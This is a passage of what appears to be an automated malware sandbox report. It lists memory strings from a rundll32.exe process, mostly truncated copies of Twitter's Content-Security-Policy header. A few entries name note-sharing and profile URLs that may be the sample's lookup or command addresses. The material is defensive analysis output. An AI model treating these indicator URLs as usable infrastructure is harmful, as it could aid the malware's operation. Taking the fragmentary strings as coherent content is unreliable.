https://twitter.com https://*.twimg.com https://*.vine.co https://*.pscp.tv https://*.video.pscp.tv https://*.giphy.com https://media.riffsy.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdh equals www.twitter.com (Twitter)
Source: rundll32.exe, 00000002.00000003.508853259.000001DEAA26B000.00000004.00000001.sdmpString found in binary or memory: dsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net ; default-src 'self'; form-action 'self' https://twitter.com https://*.twitter.com; font-src 'self' https://*.twimg.com; frame-src 'self' https://twitter.com https://mobile.twitter.com https://pay.twitter.com https://cards-frame.twitter.com ; img-src 'self' blob: data: https://*.cdn.twitter.com https://ton.twitter.com https://*.twimg.com https://analytics.twitter.com https://cm.g.doubleclick.net https://www.google-analytics.com https://www.periscope.tv https://www.pscp.tv https://media.riffsy.com https://*.giphy.com https://*.pscp.tv https://*.periscope.tv https://prod-periscope-profile.s3-us-west-2.amazonaws.com https://platform-lookaside.fbsbx.com https://scontent.xx.fbcdn.net https://*.googleusercontent.com; manifest-src 'self'; media-src 'self' blob: https://twitter.com https://*.twimg.com https://*.vine.co https://*.pscp.tv https://*.video.pscp.tv https://*.giphy.com https://media.riffsy.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdh equals www.twitter.com (Twitter)
Source: rundll32.exe, 00000002.00000002.580858440.000001DEAA264000.00000004.00000001.sdmpString found in binary or memory: et https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net ; default-src 'self'; form-action 'self' https://twitter.com https://*.twitter.com; font-src 'self' https://*.twimg.com; frame-src 'self' https://twitter.com https://mobile.twitter.com https://pay.twitter.com https://cards-frame.twitter.com ; img-src 'self' blob: data: https://*.cdn.twitter.com https://ton.twitter.com https://*.twimg.com https://analytics.twitter.com https://cm.g.doubleclick.net https://www.google-analytics.com https://www.periscope.tv https://www.pscp.tv https://media.riffsy.com https://*.giphy.com https://*.pscp.tv https://*.periscope.tv https://prod-periscope-profile.s3-us-west-2.amazonaws.com https://platform-lookaside.fbsbx.com https://scontent.xx.fbcdn.net https://*.googleusercontent.com; manifest-src 'self'; media-src 'self' blob: https://twitter.com https://*.twimg.com https://*.vine.co https://*.pscp.tv https://*.video.pscp.tv https://*.giphy.com https://media.riffsy.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdh equals www.twitter.com (Twitter)
Source: rundll32.exe, 00000002.00000003.373967961.000001DEA854C000.00000004.00000001.sdmpString found in binary or memory: https://app.simplenote.com/publish/pBn8Jtamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net; object-src 'none'; script-src 'self' 'unsafe-inline' https://*.twimg.com https://www.google-analytics.com https://twitter.com https://app.link 'nonce-MzZkMDU4ODctNjgyNC00ZmI4LWFlMTYtZGJlN2Q2MWY1Yjk2'; style-src 'self' 'unsafe-inline' https://*.twimg.com; worker-src 'self' blob:; report-uri https://twitter.com/i/csp_report?a=O5RXE%3D%3D%3D&ro=false equals www.twitter.com (Twitter)
Source: rundll32.exe, 00000002.00000003.365571089.000001DEA854C000.00000004.00000001.sdmpString found in binary or memory: https://cm.g.doubleclick.net https://www.google-analytics.com https://www.periscope.tv https://www.pscp.tv https://media.riffsy.com https://*.giphy.com https://*.pscp.tv https://*.periscope.tv https://prod-periscope-profile.s3-us-west-2.amazonaws.com https://platform-lookaside.fbsbx.com https://scontent.xx.fbcdn.net https://*.googleusercontent.com; manifest-src 'self'; media-src 'self' blob: https://twitter.com https://*.twimg.com https://*.vine.co https://*.pscp.tv https://*.video.pscp.tv https://*.giphy.com https://media.riffsy.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnF equals www.twitter.com (Twitter)
Source: rundll32.exe, 00000002.00000003.365571089.000001DEA854C000.00000004.00000001.sdmpString found in binary or memory: https://cm.g.doubleclick.net https://www.google-analytics.com https://www.periscope.tv https://www.pscp.tv https://media.riffsy.com https://*.giphy.com https://*.pscp.tv https://*.periscope.tv https://prod-periscope-profile.s3-us-west-2.amazonaws.com https://platform-lookaside.fbsbx.com https://scontent.xx.fbcdn.net https://*.googleusercontent.com; manifest-src 'self'; media-src 'self' blob: https://twitter.com https://*.twimg.com https://*.vine.co https://*.pscp.tv https://*.video.pscp.tv https://*.giphy.com https://media.riffsy.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnFF equals www.twitter.com (Twitter)
Source: rundll32.exe, 00000002.00000002.580858440.000001DEAA264000.00000004.00000001.sdmpString found in binary or memory: https://mobile.twitter.com/np8j7ovqdl8Jt1cb602262f000d2cy-policy: connect-src 'self' blob: https://*.giphy.com https://*.pscp.tv https://*.video.pscp.tv https://*.twimg.com https://api.twitter.com https://api-stream.twitter.com https://ads-api.twitter.com https://caps.twitter.com https://media.riffsy.com https://pay.twitter.com https://sentry.io https://ton.twitter.com https://twitter.com https://upload.twitter.com https://www.google-analytics.com https://app.link https://api2.branch.io https://bnc.lt https://vmap.snappytv.com https://vmapstage.snappytv.com https://vmaprel.snappytv.com https://vmap.grabyo.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net ; default-src 'self'; form-action 'self' https://twitter.com https://*.twitter.com; font-src 'self' https://*.twimg.com; frame-src 'self' https://twitter.com https://mobile.twitter.com https://pay.twitter.com https://cards-frame.twitter.com ; img-src 'self' blob: data: https://*.cdn.twitter.com https://ton.twitter.com https://*.twimg.com https://analytics.twitter.com https://cm.g.doubleclick.net https://www.google-analytics.com https://www.periscope.tv https://www.pscp.tv https://media.riffsy.com https://*.giphy.com https://*.pscp.tv https://*.periscope.tv https://prod-periscope-profile.s3-us-west-2.amazonaws.com https://platform-lookaside.fbsbx.com https://scontent.xx.fbcdn.net https://*.googleusercontent.com; manifest-src 'self'; media-src 'self' blob: https://twitter.com https://*.twimg.com https://*.vine.co https://*.pscp.tv https://*.video.pscp.tv https://*.giphy.com https://media.riffsy.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdh equals www.twitter.com (Twitter)
Source: rundll32.exe, 00000002.00000003.543376737.000001DEAA273000.00000004.00000001.sdmpString found in binary or memory: https://thinkery.me/billywilliams/5a0170161cb602262f000d2cy-policy: connect-src 'self' blob: https://*.giphy.com https://*.pscp.tv https://*.video.pscp.tv https://*.twimg.com https://api.twitter.com https://api-stream.twitter.com https://ads-api.twitter.com https://caps.twitter.com https://media.riffsy.com https://pay.twitter.com https://sentry.io https://ton.twitter.com https://twitter.com https://upload.twitter.com https://www.google-analytics.com https://app.link https://api2.branch.io https://bnc.lt https://vmap.snappytv.com https://vmapstage.snappytv.com https://vmaprel.snappytv.com https://vmap.grabyo.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net ; default-src 'self'; form-action 'self' https://twitter.com https://*.twitter.com; font-src 'self' https://*.twimg.com; frame-src 'self' https://twitter.com https://mobile.twitter.com https://pay.twitter.com https://cards-frame.twitter.com ; img-src 'self' blob: data: https://*.cdn.twitter.com https://ton.twitter.com https://*.twimg.com https://analytics.twitter.com https://cm.g.doubleclick.net https://www.google-analytics.com https://www.periscope.tv https://www.pscp.tv https://media.riffsy.com https://*.giphy.com https://*.pscp.tv https://*.periscope.tv https://prod-periscope-profile.s3-us-west-2.amazonaws.com https://platform-lookaside.fbsbx.com https://scontent.xx.fbcdn.net https://*.googleusercontent.com; manifest-src 'self'; media-src 'self' blob: https://twitter.com https://*.twimg.com https://*.vine.co https://*.pscp.tv https://*.video.pscp.tv https://*.giphy.com https://media.riffsy.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdh equals www.twitter.com (Twitter)
Source: rundll32.exe, 00000002.00000003.356545949.000001DEA855D000.00000004.00000001.sdmpString found in binary or memory: https://www.fotolog.com/vz1g3wmwuppytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net; object-src 'none'; script-src 'self' 'unsafe-inline' https://*.twimg.com https://www.google-analytics.com https://twitter.com https://app.link 'nonce-MzZkMDU4ODctNjgyNC00ZmI4LWFlMTYtZGJlN2Q2MWY1Yjk2'; style-src 'self' 'unsafe-inline' https://*.twimg.com; worker-src 'self' blob:; report-uri https://twitter.com/i/csp_report?a=O5RXE%3D%3D%3D&ro=false equals www.twitter.com (Twitter)
Source: rundll32.exe, 00000002.00000003.384639197.000001DEA8561000.00000004.00000001.sdmpString found in binary or memory: ihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net ; default-src 'self'; form-action 'self' https://twitter.com https://*.twitter.com; font-src 'self' https://*.twimg.com; frame-src 'self' https://twitter.com https://mobile.twitter.com https://pay.twitter.com https://cards-frame.twitter.com ; img-src 'self' blob: data: https://*.cdn.twitter.com https://ton.twitter.com https://*.twimg.com https://analytics.twitter.com https://cm.g.doubleclick.net https://www.google-analytics.com https://www.periscope.tv https://www.pscp.tv https://media.riffsy.com https://*.giphy.com https://*.pscp.tv https://*.periscope.tv https://prod-periscope-profile.s3-us-west-2.amazonaws.com https://platform-lookaside.fbsbx.com https://scontent.xx.fbcdn.net https://*.googleusercontent.com; manifest-src 'self'; media-src 'self' blob: https://twitter.com https://*.twimg.com https://*.vine.co https://*.pscp.tv https://*.video.pscp.tv https://*.giphy.com https://media.riffsy.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhs://mpdh equals www.twitter.com (Twitter)
Source: rundll32.exe, 00000002.00000002.578685625.000001DEA854C000.00000004.00000020.sdmpString found in binary or memory: iwimg.com https://analytics.twitter.com https://cm.g.doubleclick.net https://www.google-analytics.com https://www.periscope.tv https://www.pscp.tv https://media.riffsy.com https://*.giphy.com https://*.pscp.tv https://*.periscope.tv https://prod-periscope-profile.s3-us-west-2.amazonaws.com https://platform-lookaside.fbsbx.com https://scontent.xx.fbcdn.net https://*.googleusercontent.com; manifest-src 'self'; media-src 'self' blob: https://twitter.com https://*.twimg.com https://*.vine.co https://*.pscp.tv https://*.video.pscp.tv https://*.giphy.com https://media.riffsy.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net; object-src 'none'; script-src 'self' 'unsafe-inline' https://*.twimg.com https://www.google-analytics.com https://twitter.com https://app.link 'nonce-ZmVkOGMyZmEtOTczMS00YzdhLWI5N2UtYWRkMDk3YzM4YmU5'; style-src 'self' 'unsafe-inline' https://*.twimg.com; worker-src 'self' blob:; report-uri https://twitter.com/i/csp_report?a=O5RXE%3D%3D%3D&ro=false equals www.twitter.com (Twitter)
Source: rundll32.exe, 00000002.00000003.346339929.000001DEA854D000.00000004.00000001.sdmpString found in binary or memory: kamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net ; default-src 'self'; form-action 'self' https://twitter.com https://*.twitter.com; font-src 'self' https://*.twimg.com; frame-src 'self' https://twitter.com https://mobile.twitter.com https://pay.twitter.com https://cards-frame.twitter.com ; img-src 'self' blob: data: https://*.cdn.twitter.com https://ton.twitter.com https://*.twimg.com https://analytics.twitter.com https://cm.g.doubleclick.net https://www.google-analytics.com https://www.periscope.tv https://www.pscp.tv https://media.riffsy.com https://*.giphy.com https://*.pscp.tv https://*.periscope.tv https://prod-periscope-profile.s3-us-west-2.amazonaws.com https://platform-lookaside.fbsbx.com https://scontent.xx.fbcdn.net https://*.googleusercontent.com; manifest-src 'self'; media-src 'self' blob: https://twitter.com https://*.twimg.com https://*.vine.co https://*.pscp.tv https://*.video.pscp.tv https://*.giphy.com https://media.riffsy.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net; object-src 'none'; script-src 'self' 'unsafe-inline' https://*.twimg.com https://www.google-analytics.com https://twitter.com https://app.link 'nonce-MmYyNTgxZGItYjdiZi00OWE2LThmOWMtOTI1OGFiYjBmMzJm'; style-src 'self' 'unsafe-inline' https://*.twimg.com; worker-src 'self' blob:; report-uri https://twitter.com/i/csp_report?a=O5RXE%3D%3D%3D&ro=false equals www.twitter.com (Twitter)
Source: rundll32.exe, 00000002.00000003.543376737.000001DEAA273000.00000004.00000001.sdmpString found in binary or memory: m https://ads-api.twitter.com https://caps.twitter.com https://media.riffsy.com https://pay.twitter.com https://sentry.io https://ton.twitter.com https://twitter.com https://upload.twitter.com https://www.google-analytics.com https://app.link https://api2.branch.io https://bnc.lt https://vmap.snappytv.com https://vmapstage.snappytv.com https://vmaprel.snappytv.com https://vmap.grabyo.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net ; default-src 'self'; form-action 'self' https://twitter.com https://*.twitter.com; font-src 'self' https://*.twimg.com; frame-src 'self' https://twitter.com https://mobile.twitter.com https://pay.twitter.com https://cards-frame.twitter.com ; img-src 'self' blob: data: https://*.cdn.twitter.com https://ton.twitter.com https://*.twimg.com https://analytics.twitter.com https://cm.g.doubleclick.net https://www.google-analytics.com https://www.periscope.tv https://www.pscp.tv https://media.riffsy.com https://*.giphy.com https://*.pscp.tv https://*.periscope.tv https://prod-periscope-profile.s3-us-west-2.amazonaws.com https://platform-lookaside.fbsbx.com https://scontent.xx.fbcdn.net https://*.googleusercontent.com; manifest-src 'self'; media-src 'self' blob: https://twitter.com https://*.twimg.com https://*.vine.co https://*.pscp.tv https://*.video.pscp.tv https://*.giphy.com https://media.riffsy.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdh equals www.twitter.com (Twitter)
Source: rundll32.exe, 00000002.00000003.320997528.000001DEA8561000.00000004.00000001.sdmpString found in binary or memory: onnect-src 'self' blob: https://*.giphy.com https://*.pscp.tv https://*.video.pscp.tv https://*.twimg.com https://api.twitter.com https://api-stream.twitter.com https://ads-api.twitter.com https://caps.twitter.com https://media.riffsy.com https://pay.twitter.com https://sentry.io https://ton.twitter.com https://twitter.com https://upload.twitter.com https://www.google-analytics.com https://app.link https://api2.branch.io https://bnc.lt https://vmap.snappytv.com https://vmapstage.snappytv.com https://vmaprel.snappytv.com https://vmap.grabyo.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net ; default-src 'self'; form-action 'self' https://twitter.com https://*.twitter.com; font-src 'self' https://*.twimg.com; frame-src 'self' https://twitter.com https://mobile.twitter.com https://pay.twitter.com https://cards-frame.twitter.com ; img-src 'self' blob: data: https://*.cdn.twitter.com https://ton.twitter.com https://*.twimg.com https://analytics.twitter.com https://cm.g.doubleclick.net https://www.google-analytics.com https://www.periscope.tv https://www.pscp.tv https://media.riffsy.com https://*.giphy.com https://*.pscp.tv https://*.periscope.tv https://prod-periscope-profile.s3-us-west-2.amazonaws.com https://platform-lookaside.fbsbx.com https://scontent.xx.fbcdn.net https://*.googleusercontent.com; manifest-src 'self'; media-src 'self' blob: https://twitter.com https://*.twimg.com https://*.vine.co https://*.pscp.tv https://*.video.pscp.tv https://*.giphy.com https://media.riffsy.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net; object-src 'none'; script-src 'self' 'unsafe-inline' https://*.twimg.com https://www.google-analytics.com https://twitter.com https://app.link 'nonce-MzdiNWFlNWYtZmJjNy00YTg1LTgxNzQtYWQ1YWM5N2Y0Y2Ux'; style-src 'self' 'unsafe-inline' https://*.twimg.com; worker-src 'self' blob:; report-uri https://twitter.com/i/csp_report?a=O5RXE%3D%3D%3D&ro=false equals www.twitter.com (Twitter)
Source: rundll32.exe, 00000002.00000003.356545949.000001DEA855D000.00000004.00000001.sdmpString found in binary or memory: ppytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net; object-src 'none'; script-src 'self' 'unsafe-inline' https://*.twimg.com https://www.google-analytics.com https://twitter.com https://app.link 'nonce-MzZkMDU4ODctNjgyNC00ZmI4LWFlMTYtZGJlN2Q2MWY1Yjk2'; style-src 'self' 'unsafe-inline' https://*.twimg.com; worker-src 'self' blob:; report-uri https://twitter.com/i/csp_report?a=O5RXE%3D%3D%3D&ro=false equals www.twitter.com (Twitter)
Source: rundll32.exe, 00000002.00000003.543376737.000001DEAA273000.00000004.00000001.sdmpString found in binary or memory: ps://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net ; default-src 'self'; form-action 'self' https://twitter.com https://*.twitter.com; font-src 'self' https://*.twimg.com; frame-src 'self' https://twitter.com https://mobile.twitter.com https://pay.twitter.com https://cards-frame.twitter.com ; img-src 'self' blob: data: https://*.cdn.twitter.com https://ton.twitter.com https://*.twimg.com https://analytics.twitter.com https://cm.g.doubleclick.net https://www.google-analytics.com https://www.periscope.tv https://www.pscp.tv https://media.riffsy.com https://*.giphy.com https://*.pscp.tv https://*.periscope.tv https://prod-periscope-profile.s3-us-west-2.amazonaws.com https://platform-lookaside.fbsbx.com https://scontent.xx.fbcdn.net https://*.googleusercontent.com; manifest-src 'self'; media-src 'self' blob: https://twitter.com https://*.twimg.com https://*.vine.co https://*.pscp.tv https://*.video.pscp.tv https://*.giphy.com https://media.riffsy.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdh equals www.twitter.com (Twitter)
Source: rundll32.exe, 00000002.00000003.440801835.000001DEA853F000.00000004.00000001.sdmpString found in binary or memory: tps://media.riffsy.com https://pay.twitter.com https://sentry.io https://ton.twitter.com https://twitter.com https://upload.twitter.com https://www.google-analytics.com https://app.link https://api2.branch.io https://bnc.lt https://vmap.snappytv.com https://vmapstage.snappytv.com https://vmaprel.snappytv.com https://vmap.grabyo.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https:/ equals www.twitter.com (Twitter)
Source: rundll32.exe, 00000002.00000003.467338593.000001DEA853F000.00000004.00000001.sdmpString found in binary or memory: tps://media.riffsy.com https://pay.twitter.com https://sentry.io https://ton.twitter.com https://twitter.com https://upload.twitter.com https://www.google-analytics.com https://app.link https://api2.branch.io https://bnc.lt https://vmap.snappytv.com https://vmapstage.snappytv.com https://vmaprel.snappytv.com https://vmap.grabyo.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https:/g equals www.twitter.com (Twitter)
Source: rundll32.exe, 00000002.00000003.440801835.000001DEA853F000.00000004.00000001.sdmpString found in binary or memory: tps://media.riffsy.com https://pay.twitter.com https://sentry.io https://ton.twitter.com https://twitter.com https://upload.twitter.com https://www.google-analytics.com https://app.link https://api2.branch.io https://bnc.lt https://vmap.snappytv.com https://vmapstage.snappytv.com https://vmaprel.snappytv.com https://vmap.grabyo.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https:/{ equals www.twitter.com (Twitter)
Source: rundll32.exe, 00000002.00000003.413789298.000001DEAA26D000.00000004.00000001.sdmpString found in binary or memory: ttps://*.giphy.com https://media.riffsy.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net; object-src 'none'; script-src 'self' 'unsafe-inline' https://*.twimg.com https://www.google-analytics.com https://twitter.com https://app.link 'nonce-MWM4YzA3MmMtZGJmNi00OWJmLTg5ZTYtZjY1Y2M5ZjM3MTEy'; style-src 'self' 'unsafe-inline' https://*.twimg.com; worker-src 'self' blob:; report-uri https://twitter.com/i/csp_report?a=O5RXE%3D%3D%3D&ro=false equals www.twitter.com (Twitter)
Source: rundll32.exe, 00000002.00000003.543376737.000001DEAA273000.00000004.00000001.sdmpString found in binary or memory: ttps://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net ; default-src 'self'; form-action 'self' https://twitter.com https://*.twitter.com; font-src 'self' https://*.twimg.com; frame-src 'self' https://twitter.com https://mobile.twitter.com https://pay.twitter.com https://cards-frame.twitter.com ; img-src 'self' blob: data: https://*.cdn.twitter.com https://ton.twitter.com https://*.twimg.com https://analytics.twitter.com https://cm.g.doubleclick.net https://www.google-analytics.com https://www.periscope.tv https://www.pscp.tv https://media.riffsy.com https://*.giphy.com https://*.pscp.tv https://*.periscope.tv https://prod-periscope-profile.s3-us-west-2.amazonaws.com https://platform-lookaside.fbsbx.com https://scontent.xx.fbcdn.net https://*.googleusercontent.com; manifest-src 'self'; media-src 'self' blob: https://twitter.com https://*.twimg.com https://*.vine.co https://*.pscp.tv https://*.video.pscp.tv https://*.giphy.com https://media.riffsy.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdh equals www.twitter.com (Twitter)
Source: rundll32.exe, 00000002.00000003.416271346.000001DEA8545000.00000004.00000001.sdmpString found in binary or memory: ttps://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net ; default-src 'self'; form-action 'self' https://twitter.com https://*.twitter.com; font-src 'self' https://*.twimg.com; frame-src 'self' https://twitter.com https://mobile.twitter.com https://pay.twitter.com https://cards-frame.twitter.com ; img-src 'self' blob: data: https://*.cdn.twitter.com https://ton.twitter.com https://*.twimg.com https://analytics.twitter.com https://cm.g.doubleclick.net https://www.google-analytics.com https://www.periscope.tv https://www.pscp.tv https://media.riffsy.com https://*.giphy.com https://*.pscp.tv https://*.periscope.tv https://prod-periscope-profile.s3-us-west-2.amazonaws.com https://platform-lookaside.fbsbx.com https://scontent.xx.fbcdn.net https://*.googleusercontent.com; manifest-src 'self'; media-src 'self' blob: https://twitter.com https://*.twimg.com https://*.vine.co https://*.pscp.tv https://*.video.pscp.tv https://*.giphy.com https://media.riffsy.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net; object-src 'none'; script-src 'self' 'unsafe-inline' https://*.twimg.com https://www.google-analytics.com https://twitter.com https://app.link 'nonce-OWZkODBmZTEtNWFjNS00MzY1LWI1ODUtNTk0NzQ3MGZhMjhi'; style-src 'self' 'unsafe-inline' https://*.twimg.com; worker-src 'self' blob:; report-uri https://twitter.com/i/csp_report?a=O5RXE%3D%3D%3D&ro=false equals www.twitter.com (Twitter)
Source: rundll32.exe, 00000002.00000003.365571089.000001DEA854C000.00000004.00000001.sdmpString found in binary or memory: ttps://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net; object-src 'none'; script-src 'self' 'unsafe-inline' https://*.twimg.com https://www.google-analytics.com https://twitter.com https://app.link 'nonce-NjIzYTAxYzQtZDY1ZS00NmZlLWFjNjItMDYxNWJjZGU1YWFk'; style-src 'self' 'unsafe-inline' https://*.twimg.com; worker-src 'self' blob:; report-uri https://twitter.com/i/csp_report?a=O5RXE%3D%3D%3D&ro=false equals www.twitter.com (Twitter)
Source: rundll32.exe, 00000002.00000003.338388994.000001DEA854D000.00000004.00000001.sdmpString found in binary or memory: twitter.com/www.fotolog.com/vz1g3wmwu equals www.twitter.com (Twitter)
